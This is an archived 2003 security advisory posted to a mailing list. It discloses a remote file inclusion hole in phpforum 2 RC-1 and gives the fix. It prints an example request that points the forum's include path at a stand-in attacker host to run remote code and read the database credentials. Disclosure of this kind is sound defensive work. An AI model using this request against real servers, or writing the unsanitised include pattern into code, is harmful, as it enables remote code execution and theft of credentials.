PHP-Include-Hack-Possibility in phpforum 2 RC-1

From: theblacksheep (theblacksheepat_private)
Date: Thu Jul 10 2003 - 09:56:09 PDT

Next message: Conectiva Updates: "[CLA-2003:693] Conectiva Security Announcement - pam"

Previous message: Hal Flynn: "Re: ServU FTP Service (Win32) is able to relay email"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

 ================================================
<------------------------------------------------>
<------------#www.bright-shadows.net#------------>
<------------------------------------------------>
<--------------#theblacksheep&erik#-------------->
<------------------------------------------------>
 ================================================

Advisory Information
--------------------
Advisory Name      : PHP-Include-Hack-Possibility in phpforum 2 RC-1
Author             : Marc Bromm <theblacksheepat_private> Germany
Discover by        : Marc Bromm <theblacksheepat_private> Germany
Release Date       : 10. Juli 2003
Application        : phpforum 2 RC-1
Vendor Homepage    : http://www.phpmyforum.de/
Vendor Status      : notified
Vulnerable Versions: phpforum 2 RC-1 (maybe older)
Platforms          : OS Independent, PHP
Severity           : High

######Overview:

The phpforum is a mySQL based forum with a lot of functions.

######Exploit:

1. Exploitable file

The exploitable file is the "mainfile.php". The first 2 lines are:

----------------------------------------
<?php
include("$MAIN_PATH/config.php");    //Konfiguration
----------------------------------------

So it is possible to set $MAIN_PATH to everything.
For example:

-> www.victim.com/forum/mainfile.php?MAIN_PATH=http://www.attack.com

Then you need only a "config.php" file with the code you like to execute.
So you can get for example the SQL server password and the username which
are stored in the "config.inc.php" file.
But it is necessary that the attacking webserver (evilhost) can't be
running PHP
or the code will be run on the attacking machine rather than the target
machine.

######Solution:

Change
-----------------------------------
include("$MAIN_PATH/config.php");    //Konfiguration
-----------------------------------
to
-----------------------------------
include("config.php");    //Konfiguration
-----------------------------------
cause the config file is in the same folder as the mainfile.

Greetz to:

Erik, (O_o)oOoOoOo.
-- 
  
  theblacksheepat_private

-- 
http://www.fastmail.fm - mmm... Fastmail...

Next message: Conectiva Updates: "[CLA-2003:693] Conectiva Security Announcement - pam"
Previous message: Hal Flynn: "Re: ServU FTP Service (Win32) is able to relay email"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Jul 10 2003 - 14:11:53 PDT